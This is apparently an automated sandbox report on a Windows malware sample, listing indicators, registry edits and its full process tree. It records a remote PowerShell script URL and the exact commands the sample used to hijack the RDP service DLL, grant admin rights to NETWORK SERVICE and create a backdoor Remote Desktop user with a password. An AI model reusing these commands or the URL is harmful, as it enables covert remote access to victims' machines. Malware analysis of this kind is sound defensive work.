Analysis
- max time kernel: 128s
- max time network: 116s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 06-11-2020 11:02

Static task: static1
Behavioral task: behavioral1
  Sample: da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
  Resource: win10v20201028
General
- Target: da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
- Size: 3.3MB
- MD5: f2d37d864716da449a7791199ad3eb40
- SHA1: c04d0b96e4492e1cba6a9604addc1d8f40e98be8
- SHA256: da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b
- SHA512: a03ba66cd51e3d9ef9bbbe0f82e704ca1da13aa089dc3e03cc13900ba8f64e432949928de975d4c103ce977707a983ad1a318dc07f1e3a00d4c8daf3c1e69469
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (TTPs: 1)
  Uses net.exe to modify the user's privileges.
- Blacklisted process makes network request (IoCs: 10)
  Processes:
    flow | pid | process
    7 | 1404 | powershell.exe
    9 | 1404 | powershell.exe
    11 | 1404 | powershell.exe
    12 | 1404 | powershell.exe
    14 | 1404 | powershell.exe
    16 | 1404 | powershell.exe
    18 | 1404 | powershell.exe
    20 | 1404 | powershell.exe
    22 | 1404 | powershell.exe
    24 | 1404 | powershell.exe
- Modifies RDP port number used by Windows (TTPs: 1)
- Possible privilege escalation attempt (IoCs: 8)
  Processes:
    pid | process
    2028 | icacls.exe
    2016 | icacls.exe
    1016 | icacls.exe
    1912 | takeown.exe
    1072 | icacls.exe
    1716 | icacls.exe
    1892 | icacls.exe
    1084 | icacls.exe
- Sets DLL path for service in the registry (TTPs: 2)
-
  Processes:
    resource | yara_rule
    \Windows\Branding\mediasrv.png | upx
    \Windows\Branding\mediasvc.png | upx
- Deletes itself (IoCs: 1)
  Processes:
    pid | process
    1840 | powershell.exe
- Loads dropped DLL (IoCs: 2)
  Processes:
    pid | process
    1612 |
    1612 |
- Modifies file permissions (TTPs: 1, IoCs: 8)
  Processes:
    pid | process
    2016 | icacls.exe
    1016 | icacls.exe
    1912 | takeown.exe
    1072 | icacls.exe
    1716 | icacls.exe
    1892 | icacls.exe
    1084 | icacls.exe
    2028 | icacls.exe
- Drops file in System32 directory (IoCs: 1)
  Processes:
    description | ioc | process
    File created | C:\Windows\system32\rfxvmt.dll | powershell.exe
- Modifies service (TTPs: 2, IoCs: 2)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters | reg.exe
    Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | reg.exe
- Drops file in Windows directory (IoCs: 41)
  Processes:
    description | ioc | process
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c54978b0-1422-4127-8451-97773b2270a2 | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC161.tmp | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC2CB.tmp | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC33F.tmp | powershell.exe
    File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
    File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC082.tmp | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC31E.tmp | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d8d79ce1-0b53-4e5c-9f9d-f23df4099cac | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_12f926ac-4456-4283-b382-5271536248c4 | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC12F.tmp | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC2A9.tmp | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC2CC.tmp | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC2FC.tmp | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC33E.tmp | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC081.tmp | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_039a537a-b463-4ed4-bad6-63213505d8c0 | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files | powershell.exe
    File created | C:\Windows\branding\mediasvc.png | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c61c5cb1-2b90-43ce-b81b-dc77e6758b82 | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC130.tmp | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC2FB.tmp | powershell.exe
    File created | C:\Windows\branding\mediasrv.png | powershell.exe
    File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC160.tmp | powershell.exe
    File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_89300a00-3bce-47fe-a0bd-9d4896e13514 | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_666f2396-de9f-4a75-9679-5b587c512ba3 | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_602d319b-b9c3-408a-8431-a11cffca64e5 | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_834cc426-592e-4edc-b73f-ad71579b3194 | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarC2AA.tmp | powershell.exe
    File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
    File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WNHZGRD6YP9Y6RTTCZ5D.temp | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_df4f3563-98cc-4715-b6a1-03aa36d924df | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | powershell.exe
    File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabC31D.tmp | powershell.exe
    File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
    File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aeb1bad8-1493-4e93-849a-27b6abdb2a4f | powershell.exe
- Modifies data under HKEY_USERS (IoCs: 60)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | powershell.exe
    Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
    Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
    Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
    Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E | powershell.exe
    Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | powershell.exe
    Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f023f46d35b4d601 | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
    Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | powershell.exe
    Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
    Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
    Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
- Modifies registry key (TTPs: 1, IoCs: 1)
- Runs net.exe
- Script User-Agent (IoCs: 4)
  Uses user-agent string associated with script host/environment.
  Processes:
    description | flow | ioc
    HTTP User-Agent header | 16 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header | 11 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header | 12 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header | 14 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (IoCs: 7)
  Processes:
    pid | process
    1840 | powershell.exe
    1840 | powershell.exe
    1840 | powershell.exe
    1840 | powershell.exe
    1840 | powershell.exe
    1404 | powershell.exe
    1404 | powershell.exe
- Suspicious behavior: LoadsDriver (IoCs: 5)
  Processes:
    pid | process
    468 |
    1612 |
    1612 |
    1612 |
    1612 |
- Suspicious use of AdjustPrivilegeToken (IoCs: 15)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 1840 | powershell.exe
    Token: SeRestorePrivilege | 1716 | icacls.exe
    Token: SeAssignPrimaryTokenPrivilege | 1516 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 1516 | WMIC.exe
    Token: SeAuditPrivilege | 1516 | WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege | 1516 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 1516 | WMIC.exe
    Token: SeAuditPrivilege | 1516 | WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege | 628 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 628 | WMIC.exe
    Token: SeAuditPrivilege | 628 | WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege | 628 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 628 | WMIC.exe
    Token: SeAuditPrivilege | 628 | WMIC.exe
    Token: SeDebugPrivilege | 1404 | powershell.exe
- Suspicious use of WriteProcessMemory (IoCs: 133)
  Processes:
    description | pid | process | target process
    PID 2028 wrote to memory of 1840 | 2028 | da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe | powershell.exe
    PID 2028 wrote to memory of 1840 | 2028 | da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe | powershell.exe
    PID 2028 wrote to memory of 1840 | 2028 | da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe | powershell.exe
    PID 2028 wrote to memory of 1840 | 2028 | da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe | powershell.exe
    PID 1840 wrote to memory of 408 | 1840 | powershell.exe | csc.exe
    PID 1840 wrote to memory of 408 | 1840 | powershell.exe | csc.exe
    PID 1840 wrote to memory of 408 | 1840 | powershell.exe | csc.exe
    PID 408 wrote to memory of 576 | 408 | csc.exe | cvtres.exe
    PID 408 wrote to memory of 576 | 408 | csc.exe | cvtres.exe
    PID 408 wrote to memory of 576 | 408 | csc.exe | cvtres.exe
    PID 1840 wrote to memory of 1912 | 1840 | powershell.exe | takeown.exe
    PID 1840 wrote to memory of 1912 | 1840 | powershell.exe | takeown.exe
    PID 1840 wrote to memory of 1912 | 1840 | powershell.exe | takeown.exe
    PID 1840 wrote to memory of 1072 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1072 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1072 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1716 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1716 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1716 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1892 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1892 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1892 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1084 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1084 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1084 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 2028 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 2028 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 2028 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 2016 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 2016 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 2016 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1016 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1016 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1016 | 1840 | powershell.exe | icacls.exe
    PID 1840 wrote to memory of 1920 | 1840 | powershell.exe | reg.exe
    PID 1840 wrote to memory of 1920 | 1840 | powershell.exe | reg.exe
    PID 1840 wrote to memory of 1920 | 1840 | powershell.exe | reg.exe
    PID 1840 wrote to memory of 1848 | 1840 | powershell.exe | reg.exe
    PID 1840 wrote to memory of 1848 | 1840 | powershell.exe | reg.exe
    PID 1840 wrote to memory of 1848 | 1840 | powershell.exe | reg.exe
    PID 1840 wrote to memory of 268 | 1840 | powershell.exe | reg.exe
    PID 1840 wrote to memory of 268 | 1840 | powershell.exe | reg.exe
    PID 1840 wrote to memory of 268 | 1840 | powershell.exe | reg.exe
    PID 1840 wrote to memory of 1632 | 1840 | powershell.exe | net.exe
    PID 1840 wrote to memory of 1632 | 1840 | powershell.exe | net.exe
    PID 1840 wrote to memory of 1632 | 1840 | powershell.exe | net.exe
    PID 1632 wrote to memory of 1684 | 1632 | net.exe | net1.exe
    PID 1632 wrote to memory of 1684 | 1632 | net.exe | net1.exe
    PID 1632 wrote to memory of 1684 | 1632 | net.exe | net1.exe
    PID 1840 wrote to memory of 956 | 1840 | powershell.exe | cmd.exe
    PID 1840 wrote to memory of 956 | 1840 | powershell.exe | cmd.exe
    PID 1840 wrote to memory of 956 | 1840 | powershell.exe | cmd.exe
    PID 956 wrote to memory of 916 | 956 | cmd.exe | cmd.exe
    PID 956 wrote to memory of 916 | 956 | cmd.exe | cmd.exe
    PID 956 wrote to memory of 916 | 956 | cmd.exe | cmd.exe
    PID 916 wrote to memory of 920 | 916 | cmd.exe | net.exe
    PID 916 wrote to memory of 920 | 916 | cmd.exe | net.exe
    PID 916 wrote to memory of 920 | 916 | cmd.exe | net.exe
    PID 920 wrote to memory of 1648 | 920 | net.exe | net1.exe
    PID 920 wrote to memory of 1648 | 920 | net.exe | net1.exe
    PID 920 wrote to memory of 1648 | 920 | net.exe | net1.exe
    PID 1840 wrote to memory of 544 | 1840 | powershell.exe | cmd.exe
    PID 1840 wrote to memory of 544 | 1840 | powershell.exe | cmd.exe
    PID 1840 wrote to memory of 544 | 1840 | powershell.exe | cmd.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\da79ce774ba5bd61e0c0dc2a4d65f295cacbcfeab1695566c6543923c21b121b.exe"
    signatures: Suspicious use of WriteProcessMemory
  [2] \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      signatures: Deletes itself; Drops file in System32 directory; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ntadosty\ntadosty.cmdline"
        signatures: Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3FDE.tmp" "c:\Users\Admin\AppData\Local\Temp\ntadosty\CSC918089AEFB9045FD8E57BB6F6838F66C.TMP"
    [3] C:\Windows\system32\takeown.exe
        cmdline: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        signatures: Possible privilege escalation attempt; Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        signatures: Possible privilege escalation attempt; Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        signatures: Possible privilege escalation attempt; Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        signatures: Possible privilege escalation attempt; Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        signatures: Possible privilege escalation attempt; Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        signatures: Possible privilege escalation attempt; Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmdline: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        signatures: Possible privilege escalation attempt; Modifies file permissions
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        signatures: Modifies service; Modifies registry key
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        signatures: Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        signatures: Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start rdpdr
          signatures: Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start rdpdr
            signatures: Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start TermService
        [5] C:\Windows\system32\net.exe
            cmdline: net start TermService
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc Ghar4f5 /del
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc Ghar4f5 /del
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc 8oTGm0XS /add
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc 8oTGm0XS /add
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc 8oTGm0XS /add
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
[1] C:\Windows\System32\cmd.exe
